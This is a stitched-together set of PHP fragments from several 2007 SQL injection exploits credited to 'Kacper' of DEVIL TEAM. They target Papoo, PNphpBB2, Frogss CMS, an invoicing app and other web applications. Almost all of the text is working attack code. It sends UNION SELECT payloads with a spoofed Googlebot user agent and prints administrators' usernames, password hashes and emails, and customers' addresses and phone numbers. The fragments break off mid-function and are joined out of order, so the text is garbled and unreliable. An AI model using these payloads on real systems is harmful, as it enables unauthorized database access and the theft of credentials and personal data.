if ($prefix == "") { $packet = "GET " . $p . "kontakt.php?menuid=-1)+ HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); if (strstr($html, "You have an error in your SQL syntax")) { $temp = explode("_papoo_collum3", $html); $temp2 = explode("SELECT article FROM ", $temp[0]); $prefix = $temp2[count($temp2) - 1]; echo "prefix: " . $prefix . "\n"; } else { die("Unable to disclose table prefix...\n"); } } print "Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit by Kacper\r\n"; $packet = "GET " . $p . "kontakt.php?menuid=-1)+union+select+CONCAT(" . char_convert("<!--[#") . ",username,CHAR(58),password," . char_convert("#]-->") . ")+from+" . $prefix . "_papoo_user+WHERE+userid=" . $userid . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "kontakt.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $temp = explode('<!--[#', $html); $temp2 = explode('#]-->', $temp[1]); for ($i = 1; $i <= count($temp) - 1; $i++) { $temp2 = explode(":", $temp[$i]); if (sprawdz($temp2[1])) { echo "admin => " . $temp2[0] . "\n"; echo "password (md5) => " . $temp2[1] . "\n";
} print "Prefix -> " . $prefix . "\r\n"; print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; $packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "index.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<DEVIL_TEAM-[", $html); $t2 = explode("]-Kacper>", $t[1]); $pass = $t2[0]; echo "Admin Password: "******"\r\n"; $packet = "GET " . $p . "index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",username," . char_convert("]-Kacper>") . "),2,3,4/**/FROM/**/" . $prefix . "_phpbb_users/**/WHERE/**/user_id=" . $user_id . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "category.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<DEVIL_TEAM-[", $html); $t2 = explode("]-Kacper>", $t[1]); $nick = $t2[0]; echo "Admin Username: "******"\r\n"; if ($pass == "") { echo "exploit failed, check prefix !!!!!!!!!! (index.php?name=PNphpBB2&file=index&c='1)\r\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; }
} return $encoded; } print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n"; $packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_password," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "index.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<DEVIL_TEAM-[", $html); $t2 = explode("]-Kacper>", $t[1]); $pass = $t2[0]; $packet = "GET " . $p . "index.php?m=articles&ms=print&article_id=99999999'+union+select+0,CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",user_name," . char_convert("]-Kacper>") . "),2,3,4,5,6,7+from+" . $prefix . "users+where+user_id=" . $user_id . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "index.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<DEVIL_TEAM-[", $html); $t2 = explode("]-Kacper>", $t[1]); $nick = $t2[0]; echo "User Name: " . $nick . "\r\n"; echo "User Password: "******"\r\n"; print "++++++++++++++++++++++ DONE ++++++++++++++++++++\r\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; echo "DEVIL TEAM HOME: http://devilteam.eu/\r\n";
return $encoded; } print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; $packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",pass," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "category.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<!--[", $html); $t2 = explode("]-->", $t[1]); $pass = $t2[0]; echo "Admin Password: "******"\r\n"; $packet = "GET " . $p . "category.php?id_category=-1/**/UNION/**/SELECT/**/0,CONCAT(" . char_convert("<!--[") . ",email," . char_convert("]-->") . "),2,3/**/FROM/**/" . $prefix . "Accounts/**/WHERE/**/level=3/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "category.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<!--[", $html); $t2 = explode("]-->", $t[1]); $email = $t2[0]; echo "Admin E-Mail: " . $email . "\r\n"; ?> # milw0rm.com [2007-05-24]
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n"; print "Frogss CMS <= 0.7 SQL Injection Exploit by Kacper\r\n"; print "Vulnerabilities Number: 3\r\n"; $packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",haslo," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<!--[", $html); $t2 = explode("]-->", $t[1]); $pass = $t2[0]; echo "Admin Password: "******"\r\n"; $packet = "GET " . $p . "forum/viewtopic.php?t=-99999999/**/UNION/**/SELECT/**/0,1,CONCAT(" . char_convert("<!--[") . ",login," . char_convert("]-->") . "),3,4,5,6,7,8/**/FROM/**/uzytkownicy/**/WHERE/**/poziom=0/**/LIMIT/**/0,1/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "forum/viewtopic.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<!--[", $html); $t2 = explode("]-->", $t[1]); $login = $t2[0]; echo "Admin Login: "******"\r\n"; } ?> # milw0rm.com [2007-04-13]
} function char_convert($my_string) { $encoded = "CHAR("; for ($k = 0; $k <= strlen($my_string) - 1; $k++) { $encoded .= ord($my_string[$k]); if ($k == strlen($my_string) - 1) { $encoded .= ")"; } else { $encoded .= ","; } } return $encoded; } print "++++++++++++++++++++++ START ++++++++++++++++++++\r\n"; $packet = "GET " . $p . "index.php?module=invoices&view=email&stage=1&submit=-1/*+DEVIL+TEAM+*/union/*+devilteam.eu+*/select/*+POLISH+TEAM+*/CONCAT(" . char_convert("<DEVIL_TEAM-[") . ",name," . char_convert(":") . ",street_address," . char_convert(":") . ",street_address2," . char_convert(":") . ",city," . char_convert(":") . ",state," . char_convert(":") . ",country," . char_convert(":") . ",phone," . char_convert(":") . ",mobile_phone," . char_convert(":") . ",email," . char_convert("]-Kacper>") . "),1,2,3,4,5,6,7,8,9,10/**/FROM/*table=>*/si_customers/*+and+*/WHERE/*+user+ID+*/id=" . $user_id . "/* HTTP/1.0\r\n"; $packet .= "Referer: http://" . $host . $path . "index.php\r\n"; $packet .= "Accept-Language: pl\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; wyslijpakiet($packet); sleep(3); $t = explode("<DEVIL_TEAM-[", $html); $t2 = explode("]-Kacper>", $t[1]); $calosc = $t2[0]; $dane = explode(":", $calosc); echo "Customer Name: " . $dane[0] . "\r\n"; echo "Customer Street: " . $dane[1] . "\r\n"; echo "Customer Street address 2: " . $dane[2] . "\r\n"; echo "Customer City: " . $dane[3] . "\r\n";